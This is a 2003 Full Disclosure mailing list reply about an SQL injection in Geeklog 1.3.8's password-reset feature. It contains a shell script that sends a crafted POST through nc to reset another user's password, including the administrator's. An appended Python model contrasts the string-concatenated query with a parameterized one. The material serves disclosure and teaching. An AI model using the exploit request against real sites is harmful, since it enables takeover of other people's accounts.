Full Disclosure mailing list archives

Re: Geeklog exploit
From: Thomas Rogg <thomas () outcast-media com>
Date: Sun, 19 Oct 2003 20:15:15 +0200

On 19.10.2003 at 18:21, Jouko Pynnonen wrote at jouko () iki fi:


...
The exploit uses the "forgot password" feature introduced in Geeklog
1.3.8. By constructing a certain kind of HTTP request, an attacker can
change any user's Geeklog password, including the administrator
password. This is because of an SQL injection problem. In users.php we have
this kind of code (line about 750):
...

I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh

echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,

Thomas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
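The quoted advisory describes the flaw as an SQL injection in the "forgot password" reset check, and the posted request body sends rid=3'+or+uid='1. The following is an added Python model of that lookup (not Geeklog's code; the table layout, the pending request id and the "which uid gets reset" behaviour are constructed assumptions) showing why the concatenated query accepts the request and why the parameterized form rejects it:

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the reset flow; the table layout and request id
# are assumptions for illustration, not Geeklog's actual schema or code.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT)")
    db.execute("CREATE TABLE passwdreset (uid INTEGER, rid TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "Admin"), (2, "alice")])
    db.execute("INSERT INTO passwdreset VALUES (1, 'a1b2c3d4')")  # pending request for uid 1
    return db

# The form body from the posted script, decoded as the web server would
# ('+' becomes a space, so rid arrives as: 3' or uid='1).
BODY = "mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&"

def form_fields(body):
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def reset_lookup_vulnerable(db, uid, rid):
    """Flawed pattern: form values spliced into the SQL text.
    AND binds tighter than OR, so the WHERE clause becomes
    (uid='2' AND rid='3') OR uid='1' and matches the admin's request."""
    sql = f"SELECT uid FROM passwdreset WHERE uid = '{uid}' AND rid = '{rid}'"
    return db.execute(sql).fetchall()

def reset_lookup_safe(db, uid, rid):
    """Same check with bound parameters: rid is compared as one literal string."""
    sql = "SELECT uid FROM passwdreset WHERE uid = ? AND rid = ?"
    return db.execute(sql, (uid, rid)).fetchall()

def reset_target(db, lookup, fields):
    """Uid whose password the reset would change, or None if the request is rejected
    (assumed behaviour of the model, not a statement about Geeklog)."""
    rows = lookup(db, fields["uid"], fields["rid"])
    return rows[0][0] if rows else None

if __name__ == "__main__":
    fields = form_fields(BODY)
    db = build_db()
    print("decoded rid:", fields["rid"])
    print("vulnerable lookup resets uid:", reset_target(db, reset_lookup_vulnerable, fields))
    print("parameterized lookup resets uid:", reset_target(db, reset_lookup_safe, fields))
```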

